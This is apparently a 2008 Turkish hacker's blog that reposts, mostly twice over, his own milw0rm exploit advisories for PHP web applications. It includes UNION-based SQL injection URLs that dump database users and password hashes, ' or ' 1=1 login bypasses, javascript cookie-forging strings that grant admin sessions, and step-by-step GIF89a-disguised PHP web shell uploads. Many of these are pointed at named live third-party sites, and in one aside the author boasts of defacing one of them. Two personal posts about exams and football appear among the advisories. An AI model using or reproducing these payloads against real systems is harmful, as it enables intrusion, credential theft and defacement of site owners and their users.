TIKLA iNDiR
8 Kasım 2008 Cumartesi
ZEEJOBSITE 2.0 Remote File Upload Vulnerability
ZEEJOBSITE 2.0 Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7062
author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )
and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/jobseekers/logos/[id].php
example for demo:
user: sabrina
passwd: testing:
login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php
change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47
and your_shell link:
http://zeejobsite.com/jobseekers/logos/7271406.php
link: http://www.milw0rm.com/exploits/7062
author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )
and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/jobseekers/logos/[id].php
example for demo:
user: sabrina
passwd: testing:
login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php
change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47
and your_shell link:
http://zeejobsite.com/jobseekers/logos/7271406.php
zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities
zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7058
author: ZoRLu
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/companylogo/[id].php
example for demo:
user: zeeways
passwd: testing:
change profile direckt link: http://www.zeeproperty.com/viewprofile.php
and your_shell link:
http://www.zeeproperty.com/companylogo/5622365.php
XSS for demo:
http://www.zeeproperty.com/view_prop_details.php?propid=[XSS]
link: http://www.milw0rm.com/exploits/7058
author: ZoRLu
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/companylogo/[id].php
example for demo:
user: zeeways
passwd: testing:
change profile direckt link: http://www.zeeproperty.com/viewprofile.php
and your_shell link:
http://www.zeeproperty.com/companylogo/5622365.php
XSS for demo:
http://www.zeeproperty.com/view_prop_details.php?propid=[XSS]
7 Kasım 2008 Cuma
DeltaScripts PHP Classifieds <= 7.5 SQL Injection Vulnerability
DeltaScripts PHP Classifieds <= 7.5 SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7047
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/detail.php?siteid=[SQL]
[SQL]=
-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
live sites:
http://www.deltascripts.com/phpclassifieds/livesites
for example:
http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
link: http://www.milw0rm.com/exploits/7047
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/detail.php?siteid=[SQL]
[SQL]=
-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
live sites:
http://www.deltascripts.com/phpclassifieds/livesites
for example:
http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability
MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7046
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/EasyCalendar/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7046
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/EasyCalendar/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
MyioSoft EasyBookMarker (Auth Bypass) SQL Injection Vulnerability
MyioSoft EasyBookMarker (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7045
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/EasyBookMarker/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7045
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/EasyBookMarker/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability
MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7044
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/AjaxPortal/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7044
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/AjaxPortal/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vuln
E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7041
author: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
for demo:
http://e-topbiz.com/trafficdemos/store1/admin/login.php
username: admin ' or ' 1=1--
password: ZoRLu
link: http://www.milw0rm.com/exploits/7041
author: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
for demo:
http://e-topbiz.com/trafficdemos/store1/admin/login.php
username: admin ' or ' 1=1--
password: ZoRLu
DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability
DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7025
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/phpshop/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7025
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/phpshop/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln
DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7024
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7024
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln
DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7023
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
link: http://www.milw0rm.com/exploits/7023
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
5 Kasım 2008 Çarşamba
3 Kasım 2008 Pazartesi
kpss çalışcam a.q kpss : (
yav bıktım bu sınavlardan bir ara öss idi şimdi kpss : ( bütün sınavların a.q : ) )
online rekorunu bugün kırdı sitem :)
bugün z0rlu.blogspot.com tarihinin rekorunu kırdı ve online sayısı 9 a ulaştı ne mutlu bana : )
Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
link: http://www.milw0rm.com/exploits/6969
Discovered By: ZoRLu
admin login:
http://localhost/apoll/admin/index.php
Exploit:
username: [real_admin_or_user_name] ' or ' 1=1
password: dont write anything
note: generally admin name: admin
example for my localhost:
admin: zorlu
user: salla
username: zorlu ' or ' 1=1
password: empty
or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )
username: salla ' or ' 1=1
password: empty
file:
apoll/admin/index.php
code:
$user = $_SESSION['user'];
$pass = $_SESSION['pass'];
$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
$num = @mysql_num_rows($mysql);
link: http://www.milw0rm.com/exploits/6969
Discovered By: ZoRLu
admin login:
http://localhost/apoll/admin/index.php
Exploit:
username: [real_admin_or_user_name] ' or ' 1=1
password: dont write anything
note: generally admin name: admin
example for my localhost:
admin: zorlu
user: salla
username: zorlu ' or ' 1=1
password: empty
or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )
username: salla ' or ' 1=1
password: empty
file:
apoll/admin/index.php
code:
$user = $_SESSION['user'];
$pass = $_SESSION['pass'];
$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
$num = @mysql_num_rows($mysql);
MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability
MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/6967
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/view.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
example:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
link: http://www.milw0rm.com/exploits/6967
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/view.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
example:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
BosDev BosClassifieds (cat_id) SQL Injection Vulnerability
BosDev BosClassifieds (cat_id) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/6962
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/index.php?cat_id=[SQL]
[SQL]=
-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
example 1: ( you must look title )
http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )
example 2: ( you must look title )
http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
link: http://www.milw0rm.com/exploits/6962
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/index.php?cat_id=[SQL]
[SQL]=
-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
example 1: ( you must look title )
http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )
example 2: ( you must look title )
http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
2 Kasım 2008 Pazar
Joovili 3.1.4 Insecure Cookie Handling Vulnerability
Joovili 3.1.4 Insecure Cookie Handling Vulnerability
link: http://www.milw0rm.com/exploits/6955
Discovered By: ZoRLu
demo admin login:
http://demo.joovili.com/admin
demo user login:
http://demo.joovili.com/
demo staff login:
http://demo.joovili.com/staff/
exploit for user:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
for demo user:
javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
for demo admin:
javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
for demo staff:
javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";
link: http://www.milw0rm.com/exploits/6955
Discovered By: ZoRLu
demo admin login:
http://demo.joovili.com/admin
demo user login:
http://demo.joovili.com/
demo staff login:
http://demo.joovili.com/staff/
exploit for user:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
for demo user:
javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
for demo admin:
javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
for demo staff:
javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";
Apartment Search Script (RFU/XSS) Multiple Remote Vulnerabilities
Apartment Search Script (RFU/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/6956
Discovered By: ZoRLu
exploit:
http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
XSS
http://localhost/script_path/listtest.php?r=[XSS]
example 1 (demo):
http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
example 2:
http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
XSS example:
http://www.apt.cc/listtest.php?r=[XSS]
---------------------------------------------------------------------------
you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI )
and you add this code your shell to head
GIF89a; (en uste bu kodu ekle )
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php ( isim ver ve kaydet )
----------------------------------------------------------------------------
you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )
and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )
after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )
or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )
and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )
after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )
if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )
after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy
after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla
acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )
your_shell.php
http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
-------------------------------------------------------------------------------
example 1 (demo):
http://www.downlinegoldmine.com/apartment/Member_Admin/index.php
email: zorlu@w.cn
password: 123456
or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666
edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666
and shell.php
http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
example 2:
http://www.apt.cc/Member_Admin/index.php
email: zorlu@w.cn
password: 123456
or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187
edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187
and shell.php
http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
link: http://www.milw0rm.com/exploits/6956
Discovered By: ZoRLu
exploit:
http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
XSS
http://localhost/script_path/listtest.php?r=[XSS]
example 1 (demo):
http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
example 2:
http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
XSS example:
http://www.apt.cc/listtest.php?r=[XSS]
---------------------------------------------------------------------------
you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI )
and you add this code your shell to head
GIF89a; (en uste bu kodu ekle )
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php ( isim ver ve kaydet )
----------------------------------------------------------------------------
you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )
and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )
after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )
or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )
and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )
after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )
if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )
after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy
after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla
acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )
your_shell.php
http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
-------------------------------------------------------------------------------
example 1 (demo):
http://www.downlinegoldmine.com/apartment/Member_Admin/index.php
email: zorlu@w.cn
password: 123456
or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666
edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666
and shell.php
http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
example 2:
http://www.apt.cc/Member_Admin/index.php
email: zorlu@w.cn
password: 123456
or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187
edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187
and shell.php
http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability
Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability
link: http://www.milw0rm.com/exploits/6929
Discovered By: ZoRLu
demo admin login:
http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
demo user login:
http://demo-article-publisher-pro.phparticlescript.com/login.php
admin_name: admin
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 1
or
user_name: zorlu
passwd: zorlu
passwd_md5: 2178fb3ee4a88f946ecb68734b266c10
user_id: 6
or
user_name: demo
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 2
exploit:
admin:
javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";
user:
javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";
for demo admin: ( user_id: 1)
javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
for demo user: ( for user zorlu user_id: 6 )
javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";
for demo user: ( for user demo user_id: 2 )
javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
link: http://www.milw0rm.com/exploits/6929
Discovered By: ZoRLu
demo admin login:
http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
demo user login:
http://demo-article-publisher-pro.phparticlescript.com/login.php
admin_name: admin
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 1
or
user_name: zorlu
passwd: zorlu
passwd_md5: 2178fb3ee4a88f946ecb68734b266c10
user_id: 6
or
user_name: demo
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 2
exploit:
admin:
javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";
user:
javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";
for demo admin: ( user_id: 1)
javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
for demo user: ( for user zorlu user_id: 6 )
javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";
for demo user: ( for user demo user_id: 2 )
javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
1 Kasım 2008 Cumartesi
SFS EZ Webstore (where) Remote SQL Injection Vulnerability
SFS EZ Webstore (where) Remote SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/6922
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
[SQL]=
ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
demo
http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
link: http://www.milw0rm.com/exploits/6922
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
[SQL]=
ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
demo
http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability
SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability
link: http://www.milw0rm.com/exploits/6924
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/view_reviews.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
demo
http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
link: http://www.milw0rm.com/exploits/6924
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/view_reviews.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
demo
http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
eskişehir fenerbahçe maçı
şuan maçı izliyorum ulan helal olsun eskişehire. ben Galatasaraylıyım ama adamlar hem Galatasaray'a hemde fenerbahçeye alın teri döktürdüler. biliyorsunuz Cimbom yenildi bakalım fenerbahçe napacak skor şuan 2-2 ve dakka 68 : )
Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability
Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability
kaynak: http://www.milw0rm.com/exploits/6896
Discovered By: ZoRLu
file:
fichiers/add_url.php
code:
if (isset($_GET['art'])) {
$Article = $_GET['art'];
...
$Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
$ResultRequete = requete_mysql($Requete);
Exploit:
http://localhost/script_path/fichiers/add_url.php?art=[SQL]
[SQL]= column number 1 (SELECT TITRE FROM ...)
1'+union+select+concat(user(),0x3a,database())/*
example:
http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*
kaynak: http://www.milw0rm.com/exploits/6896
Discovered By: ZoRLu
file:
fichiers/add_url.php
code:
if (isset($_GET['art'])) {
$Article = $_GET['art'];
...
$Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
$ResultRequete = requete_mysql($Requete);
Exploit:
http://localhost/script_path/fichiers/add_url.php?art=[SQL]
[SQL]= column number 1 (SELECT TITRE FROM ...)
1'+union+select+concat(user(),0x3a,database())/*
example:
http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*
Kaydol:
Kayıtlar (Atom)
